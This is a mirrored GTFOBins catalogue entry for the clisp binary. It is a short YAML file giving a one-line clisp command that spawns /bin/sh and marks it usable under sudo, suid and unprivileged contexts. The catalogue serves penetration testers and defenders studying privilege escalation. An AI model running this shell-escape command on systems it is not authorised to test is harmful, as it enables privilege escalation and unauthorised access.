1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/clisp
2026-01-17 23:38:20 +01:00

12 lines
180 B
Plaintext

---
functions:
shell:
- code: |-
clisp -x '(ext:run-shell-command "/bin/sh")(ext:exit)'
contexts:
sudo:
suid:
shell: true
unprivileged:
...